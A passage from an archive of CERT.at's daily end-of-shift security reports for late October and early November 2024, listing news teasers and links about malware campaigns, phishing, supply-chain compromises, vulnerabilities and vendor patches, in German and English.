https://www.pentestpartners.com/security-blog/you-lost-your-iphone-but-its-… ∗∗∗ Tückische Zahlungsanweisung: Stammt diese Mail wirklich von Ihrem Chef? ∗∗∗ --------------------------------------------- Von der Buchhaltung im internationalen Großkonzern bis zur Verwaltung im Kleinbetrieb nebenan. In letzter Zeit erhalten immer mehr Mitarbeiter:innen betrügerische Mails im Namen der Geschäftsführung .. --------------------------------------------- https://www.watchlist-internet.at/news/tueckische-zahlungsanweisung-chef/ ∗∗∗ Guidance for brands to help advertising partners counter malvertising ∗∗∗ --------------------------------------------- Advice to make it harder for cyber criminals to deliver malicious advertising, and reduce the risk of cyber-facilitated fraud. --------------------------------------------- https://www.ncsc.gov.uk/guidance/guidance-brands-advertising-partners-count… ∗∗∗ With 2FA Enabled: NPM Package lottie-player Taken Over by Attackers ∗∗∗ --------------------------------------------- The popular NPM package @lottiefiles/lottie-player enables developers to seamlessly integrate Lottie animations into websites and applications. On October 30, the community reported existence of malicious code within versions 2.0.5, 2.0.6, and 2.0.7 of the npm package. The package maintainers replied and confirmed the attackers were able to .. --------------------------------------------- https://checkmarx.com/uncategorized/with-2fa-enabled-npm-package-lottie-pla… ∗∗∗ CopyRh(ight)adamantys Campaign: Rhadamantys Exploits Intellectual Property Infringement Baits ∗∗∗ --------------------------------------------- While we finalized this blog post, a technical analysis of this activity was published by fellow researchers from Cisco Talos. While it overlaps with our findings to some extent, our report provides additional extended information about the activity. Introduction Since July 2024, Check Point Research (CPR) has been tracking an extensive a.. --------------------------------------------- https://research.checkpoint.com/2024/massive-phishing-campaign-deploys-late… ∗∗∗ (In)tuned to Takeovers: Abusing Intune Permissions for Lateral Movement and Privilege Escalation in Entra ID Native Environments ∗∗∗ --------------------------------------------- The Mandiant Red Team recently supported a client to visualize the possible impact of a compromise by an advanced threat actor. During the assessment, Mandiant moved laterally from the customer’s on-premises environment to their Microsoft Entra ID .. --------------------------------------------- https://cloud.google.com/blog/topics/threat-intelligence/abusing-intune-per… ∗∗∗ Threat Campaign Spreads Winos4.0 Through Game Application ∗∗∗ --------------------------------------------- FortiGuard Labs reveals a threat actor spreads Winos4.0, infiltrating gaming apps and targeting the education sector --------------------------------------------- https://www.fortinet.com/blog/threat-research/threat-campaign-spreads-winos… ∗∗∗ Defending Your Directory: An Expert Guide to Combating Kerberoasting in Active Directory ∗∗∗ --------------------------------------------- 16 hours or less, that’s all it takes for attackers to gain access to Microsoft Active Directory (AD) and unleash mayhem on your organization. If that attack happens on a Friday afternoon, they have all weekend to wreak havoc, escalating their privileges, deploying ransomware, exploiting your VPN, or exfiltrating your data. .. --------------------------------------------- https://www.nccgroup.com/us/research-blog/defending-your-directory-an-exper… ===================== = Vulnerabilities = ===================== ∗∗∗ Cisco Nexus Dashboard Fabric Controller SQL Injection Vulnerability ∗∗∗ --------------------------------------------- A vulnerability in a REST API endpoint and web-based management interface of Cisco Nexus Dashboard Fabric Controller (NDFC) could allow an authenticated, remote attacker with read-only privileges to execute arbitrary SQL commands on an affected device. This vulnerability is due to insufficient validation of user-supplied input. An attacker could exploit .. --------------------------------------------- https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdviso… ∗∗∗ Cisco Unified Contact Center Management Portal Stored Cross-Site Scripting Vulnerability ∗∗∗ --------------------------------------------- A vulnerability in the web-based management interface of Cisco Unified Contact Center Management Portal (Unified CCMP) could allow an authenticated, remote attacker with low privileges to conduct a stored .. --------------------------------------------- https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdviso… ∗∗∗ Security updates for Wednesday ∗∗∗ --------------------------------------------- Security updates have been issued by AlmaLinux (libtiff), Debian (context, libheif, and thunderbird), Fedora (php-tcpdf, syncthing, and thunderbird), Gentoo (EditorConfig core C library, Flatpak, Neat VNC, and Ubiquiti UniFi), Oracle (bcc, bpftrace, grafana-pcp, haproxy, kernel, krb5, libtiff, python-gevent, python3.11-urllib3, python3.12-urllib3, and xmlrpc-c), .. --------------------------------------------- https://lwn.net/Articles/997182/ -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 05.11.2024
by Daily end-of-shift report 05 Nov '24

05 Nov '24

===================== = End-of-Day report = ===================== Timeframe: Montag 04-11-2024 18:00 − Dienstag 05-11-2024 18:00 Handler: Alexander Riepl Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Windows Server 2025 released—here are the new features ∗∗∗ --------------------------------------------- Microsoft has announced that Windows Server 2025, the latest version of its server operating system, is generally available starting Friday, November 1st. --------------------------------------------- https://www.bleepingcomputer.com/news/microsoft/windows-server-2025-release… ∗∗∗ Nokia investigates breach after hacker claims to steal source code ∗∗∗ --------------------------------------------- Nokia is investigating whether a third-party vendor was breached after a hacker claimed to be selling the companys stolen source code. --------------------------------------------- https://www.bleepingcomputer.com/news/security/nokia-investigates-breach-af… ∗∗∗ Google fixes two Android zero-days used in targeted attacks ∗∗∗ --------------------------------------------- Google fixed two actively exploited Android zero-day flaws as part of its November security updates, addressing a total of 51 vulnerabilities. --------------------------------------------- https://www.bleepingcomputer.com/news/security/google-fixes-two-android-zer… ∗∗∗ Angriff auf Schneider Electric: Hungrige Hacker fordern Baguettes als Lösegeld ∗∗∗ --------------------------------------------- Die Angreifer behaupten, über 40 GBytes an Daten von Schneider Electric erbeutet zu haben. Ihre Forderung: 125.000 US-Dollar in Form von Baguettes. --------------------------------------------- https://www.golem.de/news/angriff-auf-schneider-electric-hungrige-hacker-fo… ∗∗∗ Olympia-Kassensysteme: Registrierkassen seit drei Jahren ohne Sicherheitsupdates ∗∗∗ --------------------------------------------- Registrierkassen der Marke Olympia laufen auf Android 11 und bergen Risiken für den Zahlungsverkehr. --------------------------------------------- https://www.golem.de/news/olympia-kassensysteme-registrierkassen-seit-drei-… ∗∗∗ Python RAT with a Nice Screensharing Feature ∗∗∗ --------------------------------------------- While hunting, I found another interesting Python RAT in the wild. This is not brand new because the script was released two years ago. The script I found is based on the same tool and still .. --------------------------------------------- https://isc.sans.edu/diary/Python+RAT+with+a+Nice+Screensharing+Feature/314… ∗∗∗ Maritime lawyers assemble! ∗∗∗ --------------------------------------------- Maritime cyber insurance has been playing catch-up with maritime cyber security for a while now. It was all pretty good until the availability of cheap VSAT meant that ships .. --------------------------------------------- https://www.pentestpartners.com/security-blog/maritime-lawyers-assemble/ ∗∗∗ In final check-in before Election Day, CISA cites low-level threats, and not much else ∗∗∗ --------------------------------------------- Incidents to date have included “low level” distributed denial-of-service activity, criminal destruction of ballot drop boxes and continued threats targeting election officials, CISA Director Jen Easterly .. --------------------------------------------- https://therecord.media/cisa-2024-presidential-election-threats ∗∗∗ Smart Cities gegen Cyberattacken resilient machen ∗∗∗ --------------------------------------------- Ob es uns gefällt oder nicht – Städte weltweit wandeln sich in sogenannte "Smart Cities". Die Protagonisten versprechen Innovation, Nachhaltigkeit und digitales Wachstum. Aber diese Infrastruktur bzw. die .. --------------------------------------------- https://www.borncity.com/blog/2024/11/05/smart-cities-gegen-cyberattacken-r… ∗∗∗ SOC Around the Clock: World Tour Survey Findings ∗∗∗ --------------------------------------------- Trend surveyed 750 cybersecurity professionals in 49 countries to learn more about the state of .. --------------------------------------------- https://www.trendmicro.com/en_us/research/24/k/world-tour-survey-results.ht… ===================== = Vulnerabilities = ===================== ∗∗∗ Security updates for Tuesday ∗∗∗ --------------------------------------------- Security updates have been issued by AlmaLinux (firefox, openexr, and thunderbird), Fedora (llama-cpp and python-quart), Oracle (firefox, openexr, thunderbird, and xorg-x11-server and xorg-x11-server-Xwayland), SUSE (chromium, govulncheck-vulndb, openssl-1_1, python311, and python312), and Ubuntu (linux-azure, linux-bluefield, linux-azure, linux-gcp, linux-ibm, openjpeg2, and ruby3.0, ruby3.2, ruby3.3). --------------------------------------------- https://lwn.net/Articles/997030/ -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 04.11.2024
by Daily end-of-shift report 04 Nov '24

04 Nov '24

===================== = End-of-Day report = ===================== Timeframe: Donnerstag 31-10-2024 18:00 − Montag 04-11-2024 18:00 Handler: Alexander Riepl Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Thousands of hacked TP-Link routers used in years-long account takeover attacks ∗∗∗ --------------------------------------------- The botnet is being skillfully used to launch "highly evasive" password-spraying attacks. --------------------------------------------- https://arstechnica.com/information-technology/2024/11/microsoft-warns-of-8… ∗∗∗ DDoS site Dstat.cc seized and two suspects arrested in Germany ∗∗∗ --------------------------------------------- The Dstat.cc DDoS review platform has been seized by law enforcement, and two suspects have been arrested after the service helped fuel distributed denial-of-service attacks for years. --------------------------------------------- https://www.bleepingcomputer.com/news/security/ddos-site-dstatcc-seized-and… ∗∗∗ Cisco says DevHub site leak won’t enable future breaches ∗∗∗ --------------------------------------------- Cisco says that non-public files recently downloaded by a threat actor from a misconfigured public-facing DevHub portal dont contain information that could be exploited in future breaches of the companys systems. --------------------------------------------- https://www.bleepingcomputer.com/news/security/cisco-says-devhub-site-leak-… ∗∗∗ Ware nicht geliefert: Betrüger hacken Tausende Webshops und kassieren Millionen ∗∗∗ --------------------------------------------- Hacker haben seit 2019 im Rahmen einer Betrugskampagne unzählige Onlineshops infiltriert. Käufer bestimmter Produkte erhielten .. --------------------------------------------- https://www.golem.de/news/ware-nicht-geliefert-betrueger-hacken-tausende-we… ∗∗∗ From Naptime to Big Sleep: Using Large Language Models To Catch Vulnerabilities In Real-World Code ∗∗∗ --------------------------------------------- In our previous post, Project Naptime: Evaluating Offensive Security Capabilities of Large Language Models, we introduced our framework for large-language-model-assisted vulnerability research and demonstrated its potential by improving the state-of-the-art performance on Meta's CyberSecEval2 benchmarks. Since then, Naptime has evolved into Big Sleep, a collaboration between Google Project Zero and Google DeepMind. --------------------------------------------- https://googleprojectzero.blogspot.com/2024/10/from-naptime-to-big-sleep.ht… ∗∗∗ Inside Iran’s Cyber Playbook: AI, Fake Hosting, and Psychological Warfare ∗∗∗ --------------------------------------------- U.S. and Israeli cybersecurity agencies have published a new advisory attributing an Iranian cyber group to targeting the 2024 Summer Olympics and compromising a French commercial dynamic display provider to show messages denouncing Israels participation .. --------------------------------------------- https://thehackernews.com/2024/11/inside-irans-cyber-playbook-ai-fake.html ∗∗∗ Financial institutions told to get their house in order before the next CrowdStrike strikes ∗∗∗ --------------------------------------------- Calls for improvements will soon turn into demands when new rules come into force The UKs finance regulator is urging all institutions under its remit to better prepare for IT meltdowns like .. --------------------------------------------- https://www.theregister.com/2024/11/02/fca_it_resilience/ ∗∗∗ Booking.com Phishers May Leave You With Reservations ∗∗∗ --------------------------------------------- A number of cybercriminal innovations are making it easier for scammers to cash in on your upcoming travel plans. This story examines a recent spear-phishing campaign that ensued when a California hotel had its booking.com credentials stolen. Well .. --------------------------------------------- https://krebsonsecurity.com/2024/11/booking-com-phishers-may-leave-you-with… ∗∗∗ Kostenlose Webinare zum Schutz im Internet ∗∗∗ --------------------------------------------- Ab 2. Dezember finden in Kooperation mit der AK Oberösterreich und Saferinternet.at spannende Webinare zum sicheren und verantwortungsvollen Umgang mit Handy und Internet statt. Erweitern Sie Ihre digitalen Kompetenzen und .. --------------------------------------------- https://www.watchlist-internet.at/news/kostenlose-webinare-zum-schutz-im-in… ∗∗∗ TA Phone Home: EDR Evasion Testing Reveals Extortion Actors Toolkit ∗∗∗ --------------------------------------------- A threat actor attempted to use an AV/EDR bypass tool in an extortion attempt. Instead, the tool provided Unit 42 insight into the threat actor. --------------------------------------------- https://unit42.paloaltonetworks.com/edr-bypass-extortion-attempt-thwarted/ ∗∗∗ FBI wants more info on hackers behind Sophos exploitation after report on China’s intrusions ∗∗∗ --------------------------------------------- The FBI is asking the public for help in tracking down the people behind a series of intrusions into edge devices and networks. --------------------------------------------- https://therecord.media/fbi-hackers-china-wants-info ∗∗∗ Kimsuky Group’s Malware Disguised as Lecture Request Form (MSC, HWP) ∗∗∗ --------------------------------------------- Recently, malware disguised as a lecture request form targeting specific users was identified. The distributed files include Hangul Word Processor (HWP) documents and files in MSC format, which download additional malicious files. Decoy document files used to disguise as legitimate documents have been found to sometimes contain .. --------------------------------------------- https://asec.ahnlab.com/en/84181/ ∗∗∗ Supply Chain Attack Using Ethereum Smart Contracts to Distribute Multi-Platform Malware ∗∗∗ --------------------------------------------- age “jest-fet-mock,” which implements a different approach using Ethereum smart contracts for command-and-control operations. The package masquerades as a popular testing utility while distributing malware across Windows, Linux, and macOS platforms. This discovery represents a notable difference in supply chain attack methodologies, combining .. --------------------------------------------- https://checkmarx.com/blog/supply-chain-attack-using-ethereum-smart-contrac… ∗∗∗ Hackers Claim Access to Nokia Internal Data, Selling for $20,000 ∗∗∗ --------------------------------------------- Hackers claim to have breached Nokia through a third-party contractor, allegedly stealing SSH keys, source code, and internal --------------------------------------------- https://hackread.com/hackers-claim-access-nokia-internal-data-selling-20k/ ∗∗∗ Mallox Ransomware ∗∗∗ --------------------------------------------- FortiGuard Labs continue to see increase in Mallox ransomware related activities detecting Mallox ransomware on multiple hundred FortiGuard sensors. Ransomware infection may cause disruption, damage to daily operations, .. --------------------------------------------- https://fortiguard.fortinet.com/outbreak-alert/mallox-ransomware ∗∗∗ Missing Link: Wie ein Unternehmen bei einem Cyberangriff die Kontrolle verlor ∗∗∗ --------------------------------------------- Eigentlich fühlt sich der IT-Chef recht sicher. Bis Hacker mitten am Tag in die Firma marschieren – und unbehelligt wieder raus. Die Beute: volle Kontrolle. --------------------------------------------- https://heise.de/-9984869 ===================== = Vulnerabilities = ===================== ∗∗∗ Security updates for Monday ∗∗∗ --------------------------------------------- Security updates have been issued by AlmaLinux (firefox, grafana, kernel, and mod_http2), Debian (chromium, openssl, and thunderbird), Fedora (chromium, krb5, mysql8.0, polkit, python-single-version, and webkitgtk), Mageia (bind, buildah, podman, skopeo, kernel, kmod-xtables-addons. kmod-virtualbox, kernel-firmware & kernel-firmware-nonfree radeon-firmware, .. --------------------------------------------- https://lwn.net/Articles/996908/ ∗∗∗ WordPress Vulnerability & Patch Roundup October 2024 ∗∗∗ --------------------------------------------- https://blog.sucuri.net/2024/11/wordpress-vulnerability-patch-roundup-octob… -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 31.10.2024
by Daily end-of-shift report 31 Oct '24

31 Oct '24

===================== = End-of-Day report = ===================== Timeframe: Mittwoch 30-10-2024 18:00 − Donnerstag 31-10-2024 18:00 Handler: Alexander Riepl Co-Handler: Michael Schlagenhaufer ===================== = News = ===================== ∗∗∗ With 2FA Enabled: NPM Package lottie-player Taken Over by Attackers ∗∗∗ --------------------------------------------- On October 30, the community reported existence of malicious code within versions 2.0.5, 2.0.6, and 2.0.7 of the npm package. The package maintainers replied and confirmed the attackers were able to take over the NPM package using a leaked automation token which was used to automate publications of NPM packages. --------------------------------------------- https://checkmarx.com/blog/with-2fa-enabled-npm-package-lottie-player-taken… ∗∗∗ GreyNoise Intelligence Discovers Zero-Day Vulnerabilities in Live Streaming Cameras with the Help of AI ∗∗∗ --------------------------------------------- Affected devices are typically high-cost live streaming cameras, sometimes exceeding several thousand dollars. [..] Affected devices use VHD PTZ camera firmware < 6.3.40 used in PTZOptics, Multicam Systems SAS, and SMTAV Corporation devices based on Hisilicon Hi3516A V600 SoC V60, V61, and V63. These cameras, which feature an embedded web server allowing for direct access by web browser, are reportedly deployed in environments where reliability and privacy are crucial, including: Industrial and manufacturing plants [..] Business conferences [..] Healthcare settings [..] State and local government environments [..] Houses of worship --------------------------------------------- https://www.greynoise.io/blog/greynoise-intelligence-discovers-zero-day-vul… ∗∗∗ Midnight Blizzard conducts large-scale spear-phishing campaign using RDP files ∗∗∗ --------------------------------------------- Microsoft is releasing this blog to notify the public and disrupt this threat actor activity. This blog provides context on these external spear-phishing attempts, which are common attack techniques and do not represent any new compromise of Microsoft. --------------------------------------------- https://www.microsoft.com/en-us/security/blog/2024/10/29/midnight-blizzard-… ∗∗∗ Discovering Hidden Vulnerabilities in Portainer with CodeQL ∗∗∗ --------------------------------------------- In this blog, we will show how we used CodeQL to find these vulnerabilities and even wrote custom queries to find a specific vulnerability. --------------------------------------------- https://www.cyberark.com/resources/threat-research-blog/discovering-hidden-… ∗∗∗ Loose-lipped neural networks and lazy scammers ∗∗∗ --------------------------------------------- As large language models improve, their strengths and weaknesses, as well as the tasks they do well or poorly, are becoming better understood. Threat actors are exploring applications of this technology in a range of automation scenarios. But, as we see, they sometimes commit blunders that help shed light on how they use LLMs, at least in the realm of online fraud. --------------------------------------------- https://securelist.com/llm-phish-blunders/114367/ ∗∗∗ Mounting memory with MemProcFS for advanced memory forensics ∗∗∗ --------------------------------------------- Whilst this blog does not intend to go into any detail into some of the most popular tools available to analyse memory, nor a deep dive into analysis techniques it is intended to provide high level information about some significant enhances to memory forensics in the last few years and the difference in tooling. This also covers three memory forensic tools; many others are available. --------------------------------------------- https://www.pentestpartners.com/security-blog/mounting-memory-with-memprocf… ∗∗∗ The Persistent Perimeter Threat: Strategic Insights from a Multi-Year APT Campaign Targeting Edge Devices ∗∗∗ --------------------------------------------- Discover insights from a multi-year APT campaign that exploited network perimeter vulnerabilities to target high-value entities, revealing critical gaps in edge device security. --------------------------------------------- https://www.greynoise.io/blog/the-persistent-perimeter-threat-strategic-ins… ∗∗∗ Auditing K3s Clusters ∗∗∗ --------------------------------------------- K3s shares a great deal with standard Kubernetes, but its lightweight implementation comes with some challenges and opportunities in the security sphere. --------------------------------------------- https://www.nccgroup.com/us/research-blog/auditing-k3s-clusters/ ===================== = Vulnerabilities = ===================== ∗∗∗ LiteSpeed Cache WordPress plugin bug lets hackers get admin access ∗∗∗ --------------------------------------------- The free version of the popular WordPress plugin LiteSpeed Cache has fixed a dangerous privilege elevation flaw on its latest release that could allow unauthenticated site visitors to gain admin rights. [..] The newly discovered high-severity flaw tracked as CVE-2024-50550 is caused by a weak hash check in the plugin's "role simulation" feature, designed to simulate user roles to aid the crawler in site scans from different user levels. --------------------------------------------- https://www.bleepingcomputer.com/news/security/litespeed-cache-wordpress-pl… ∗∗∗ Security updates for Thursday ∗∗∗ --------------------------------------------- Security updates have been issued by Debian (firefox-esr and openssl), Fedora (firefox, libarchive, micropython, NetworkManager-libreswan, and xorg-x11-server-Xwayland), Red Hat (nano), Slackware (mozilla-firefox, mozilla-thunderbird, tigervnc, and xorg), SUSE (389-ds, Botan, go1.21-openssl, govulncheck-vulndb, java-11-openjdk, lxc, python-Werkzeug, and uwsgi), and Ubuntu (firefox, libarchive, linux-azure-fde, linux-azure-fde-5.15, python-pip, and xorg-server, xorg-server-hwe-16.04, xorg-server-hwe-18.04). --------------------------------------------- https://lwn.net/Articles/996526/ ∗∗∗ Drupal: Cookiebot + GTM - Moderately critical - Cross Site Scripting - SA-CONTRIB-2024-055 ∗∗∗ --------------------------------------------- https://www.drupal.org/sa-contrib-2024-055 ∗∗∗ Bosch: DoS vulnerability on IndraDrive ∗∗∗ --------------------------------------------- https://psirt.bosch.com/security-advisories/bosch-sa-315415.html -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 30.10.2024
by Daily end-of-shift report 30 Oct '24

30 Oct '24

===================== = End-of-Day report = ===================== Timeframe: Dienstag 29-10-2024 18:00 − Mittwoch 30-10-2024 18:00 Handler: Alexander Riepl Co-Handler: Michael Schlagenhaufer ===================== = News = ===================== ∗∗∗ Hackers steal 15,000 cloud credentials from exposed Git config files ∗∗∗ --------------------------------------------- A global large-scale dubbed "EmeraldWhale" exploited misconfigured Git configuration files to steal over 15,000 cloud account credentials from thousands of private repositories. --------------------------------------------- https://www.bleepingcomputer.com/news/security/hackers-steal-15-000-cloud-c… ∗∗∗ Jumpy Pisces Engages in Play Ransomware ∗∗∗ --------------------------------------------- Jumpy Pisces, also known as Andariel and Onyx Sleet, was historically involved in cyberespionage, financial crime and ransomware attacks. [..] We expect their attacks will increasingly target a wide range of victims globally. Network defenders should view Jumpy Pisces activity as a potential precursor to ransomware attacks, not just espionage, underscoring the need for heightened vigilance. --------------------------------------------- https://unit42.paloaltonetworks.com/north-korean-threat-group-play-ransomwa… ∗∗∗ Writing a BugSleep C2 server and detecting its traffic with Snort ∗∗∗ --------------------------------------------- In June 2024, security researchers published their analysis of a novel implant dubbed “MuddyRot”(aka "BugSleep"). [..] This blog will demonstrate the practice and methodology of reversing BugSleep’s protocol, writing a functional C2 server, and detecting this traffic with Snort. --------------------------------------------- https://blog.talosintelligence.com/writing-a-bugsleep-c2-server/ ∗∗∗ Cryptocurrency Enthusiasts Targeted in Multi-Vector Supply Chain Attack ∗∗∗ --------------------------------------------- Cryptocurrency enthusiasts have been the target of another sophisticated and invasive malware campaign. This campaign was orchestrated through multiple attack vectors, including a malicious Python package named “cryptoaitools” on PyPI and deceptive GitHub repositories. This multi-stage malware, masquerading as a suite of cryptocurrency trading tools, aims to steal a wide range of sensitive data and drain victims’ crypto wallets. --------------------------------------------- https://checkmarx.com/blog/cryptocurrency-enthusiasts-targeted-in-multi-vec… ∗∗∗ New “Scary” FakeCall Malware Captures Photos and OTPs on Android ∗∗∗ --------------------------------------------- A new, more sophisticated variant of the FakeCall malware is targeting Android devices. [..] The FakeCall malware typically infiltrates a device through a malicious app downloaded from a compromised website or a phishing email. The app requests permission to become the default call handler. If granted, the malware gains extensive privileges. --------------------------------------------- https://hackread.com/scary-fakecall-malware-captures-photos-otps-android/ ===================== = Vulnerabilities = ===================== ∗∗∗ Nach Pwn2Own: QNAP und Synology patchen ausgenutzte NAS-Lücken ∗∗∗ --------------------------------------------- Für auf der Pwn2Own ausgenutzte TrueNAS-Lücken scheint es derweil noch keine Patches zu geben – dafür aber Hinweise, wie Nutzer ihre Systeme vor möglichen Angriffen schützen können. [..] Erste Patches gibt es beispielsweise von Synology. Das Unternehmen hat schon am 25. Oktober Updates für Beephotos für Beestation OS 1.0 und 1.1 sowie Synology Photos 1.7 und 1.6 für DSM 7.2 bereitgestellt. Diese schließen jeweils eine kritische Sicherheitslücke, die es Angreifern erlaubt, aus der Ferne Schadcode auszuführen. --------------------------------------------- https://www.golem.de/news/nach-pwn2own-qnap-und-synology-patchen-ausgenutzt… ∗∗∗ Security updates for Wednesday ∗∗∗ --------------------------------------------- Security updates have been issued by AlmaLinux (buildah), Debian (python-git, texlive-bin, and xorg-server), Mageia (chromium-browser-stable), Red Hat (kernel), SUSE (Botan, go1.22-openssl, go1.23-openssl, grafana, libgsf, pcp, pgadmin4, python310-pytest-html, python313, xorg-x11-server, and xwayland), and Ubuntu (nano, python-urllib3, and xorg-server, xwayland). --------------------------------------------- https://lwn.net/Articles/996310/ ∗∗∗ QNAP: Vulnerability in SMB Service (PWN2OWN 2024) ∗∗∗ --------------------------------------------- https://www.qnap.com/en-us/security-advisory/QSA-24-42 ∗∗∗ SPLUNK: SVD-2024-1015: Third-Party Package Updates in the Splunk Add-on for Cisco Meraki - October 2024 ∗∗∗ --------------------------------------------- https://advisory.splunk.com//advisories/SVD-2024-1015 ∗∗∗ SPLUNK: SVD-2024-1014: Third-Party Package Updates in the Splunk Add-on for Google Cloud Platform - October 2024 ∗∗∗ --------------------------------------------- https://advisory.splunk.com//advisories/SVD-2024-1014 ∗∗∗ Ping Identity PingIDM: Query Filter Injection in Ping Identity PingIDM (formerly known as ForgeRock Identity Management) ∗∗∗ --------------------------------------------- https://sec-consult.com/de/vulnerability-lab/advisory/query-filter-injectio… -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 29.10.2024
by Daily end-of-shift report 29 Oct '24

29 Oct '24

===================== = End-of-Day report = ===================== Timeframe: Montag 28-10-2024 18:00 − Dienstag 29-10-2024 18:00 Handler: Michael Schlagenhaufer Co-Handler: n/a ===================== = News = ===================== ∗∗∗ New tool bypasses Google Chrome’s new cookie encryption system ∗∗∗ --------------------------------------------- A researcher has released a tool to bypass Googles new App-Bound encryption cookie-theft defenses and extract saved credentials from the Chrome web browser. --------------------------------------------- https://www.bleepingcomputer.com/news/security/new-tool-bypasses-google-chr… ∗∗∗ Exchange Online: Inbound SMTP DANE mit DNSSEC verfügbar ∗∗∗ --------------------------------------------- Microsoft hat das Inbound SMTP DANE mit DNSSEC für Exchange Online allgemein freigegeben, nachdem das Ganze bereits im Juli 2024 als Preview verfügbar war. Mit der neuen Funktion Inbound SMTP DANE with DNSSEC in Exchange Online soll die Sicherheit der E-Mail-Kommunikation durch die Unterstützung zweier Sicherheitsstandards erhöht werden. --------------------------------------------- https://www.borncity.com/blog/2024/10/29/exchange-online-inbound-smtp-dane-… ∗∗∗ Ransomware-Angriffe auf Sonicwall SSL-VPNs ∗∗∗ --------------------------------------------- IT-Forscher haben Attacken auf Sonicwall SSL-VPNs untersucht und dabei Ransomware-Aktivitäten von Akira und Fog entdeckt. [..] Die Sonicwall-Geräte, durch die die Täter einbrechen konnten, waren allesamt nicht gegen die Schwachstelle CVE-2024-40766 gepatcht – mit einem CVSS-Wert von 9.3 gilt sie als kritisches Risiko. Anfang September warnte Sonicwall, dass diese Sicherheitslücke in den SSL-VPNs bereits aktiv angegriffen wird, und wies nochmals auf die verfügbaren Updates hin, die das Sicherheitsleck stopfen. --------------------------------------------- https://heise.de/-9998068 ∗∗∗ New Research Reveals Spectre Vulnerability Persists in Latest AMD and Intel Processors ∗∗∗ --------------------------------------------- More than six years after the Spectre security flaw impacting modern CPU processors came to light, new research has found that the latest AMD and Intel processors are still susceptible to speculative execution attacks. [..] The attack has been described as the first, practical "end-to-end cross-process Spectre leak." --------------------------------------------- https://thehackernews.com/2024/10/new-research-reveals-spectre.html ∗∗∗ What Are My OPTIONS? CyberPanel v2.3.6 pre-auth RCE ∗∗∗ --------------------------------------------- Few months ago I was assigned to do a pentest on a target running CyberPanel. It seemed to be installed by default by some VPS providers & it was also sponsored by Freshworks. [..] if you’re a beginner with a creative mind looking to get started with code review, I definitely recommend you read this blog. --------------------------------------------- https://dreyand.rs/code/review/2024/10/27/what-are-my-options-cyberpanel-v2… ∗∗∗ Vorsicht vor dieser Instagram-Nachricht: „Ich brauche deine Hilfe“ ∗∗∗ --------------------------------------------- „Ich brauche deine Hilfe“ schreibt eine bekannte Person oder auch ein Freund oder eine Freundin auf Instagram. Die Person bittet Sie, bei einem Voting für sie abzustimmen und schickt Ihnen einen Link. Vorsicht: Es handelt sich um eine Betrugsmasche! --------------------------------------------- https://www.watchlist-internet.at/news/instagram-nachricht-hilfe/ ===================== = Vulnerabilities = ===================== ∗∗∗ QNAP: Vulnerability in HBS 3 Hybrid Backup Sync (PWN2OWN 2024) ∗∗∗ --------------------------------------------- An OS command injection vulnerability has been reported to affect HBS 3 Hybrid Backup Sync. If exploited, the vulnerability could allow remote attackers to execute arbitrary commands. Critical, CVE-2024-50388 --------------------------------------------- https://www.qnap.com/en-us/security-advisory/QSA-24-41 ∗∗∗ Spring: Authorization Bypass of Static Resources in WebFlux Applications ∗∗∗ --------------------------------------------- Spring WebFlux applications that have Spring Security authorization rules on static resources can be bypassed under certain circumstances. CRITICAL, CVE-2024-38821 --------------------------------------------- https://spring.io/security/cve-2024-38821/ ∗∗∗ Auch verfügbar: Updates für iOS 17, macOS 14 und macOS 13 – mit Sicherheitsfixes ∗∗∗ --------------------------------------------- Apple hat neben iOS 18.1, iPadOS 18.1 und macOS 15.1 auch Updates für ältere Betriebssysteme bereitgestellt. Sie beheben nur Sicherheitsprobleme. --------------------------------------------- https://heise.de/-9997116 ∗∗∗ Mozilla Security Advisories October 29, 2024 ∗∗∗ --------------------------------------------- Thunderbird 132, Thunderbird 128.4, Firefox ESR 115.17, Firefox ESR 128.4 and Firefox 132. --------------------------------------------- https://www.mozilla.org/en-US/security/advisories/ ∗∗∗ Security updates for Tuesday ∗∗∗ --------------------------------------------- Security updates have been issued by Debian (exim4) and SUSE (chromium, openssl-1_1, and openssl-3). --------------------------------------------- https://lwn.net/Articles/996196/ ∗∗∗ 0patch: We Patched CVE-2024-38030, Found Another Windows Themes Spoofing Vulnerability (0day) ∗∗∗ --------------------------------------------- https://blog.0patch.com/2024/10/we-patched-cve-2024-38030-found-another.html ∗∗∗ OneDev Security Update Advisory (CVE-2024-45309) ∗∗∗ --------------------------------------------- https://asec.ahnlab.com/en/84118/ ∗∗∗ Solar-Log Base 15 ∗∗∗ --------------------------------------------- https://www.cisa.gov/news-events/ics-advisories/icsa-24-303-02 ∗∗∗ Delta Electronics InfraSuite Device Master ∗∗∗ --------------------------------------------- https://www.cisa.gov/news-events/ics-advisories/icsa-24-303-03 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 28.10.2024
by Daily end-of-shift report 28 Oct '24

28 Oct '24

===================== = End-of-Day report = ===================== Timeframe: Freitag 25-10-2024 18:00 − Montag 28-10-2024 18:00 Handler: Michael Schlagenhaufer Co-Handler: Alexander Riepl ===================== = News = ===================== ∗∗∗ Amazon seizes domains used in rogue Remote Desktop campaign to steal data ∗∗∗ --------------------------------------------- Amazon has seized domains used by the Russian APT29 hacking group in targeted attacks against government and military organizations to steal Windows credentials and data using malicious Remote Desktop Protocol connection files. --------------------------------------------- https://www.bleepingcomputer.com/news/security/amazon-seizes-domains-used-i… ∗∗∗ Redline, Meta infostealer malware operations seized by police ∗∗∗ --------------------------------------------- The Dutch National Police seized the network infrastructure for the Redline and Meta infostealer malware operations in "Operation Magnus," warning cybercriminals that their data is now in the hands of the law enforcement. --------------------------------------------- https://www.bleepingcomputer.com/news/legal/redline-meta-infostealer-malwar… ∗∗∗ 70 Zero-Day-Lücken 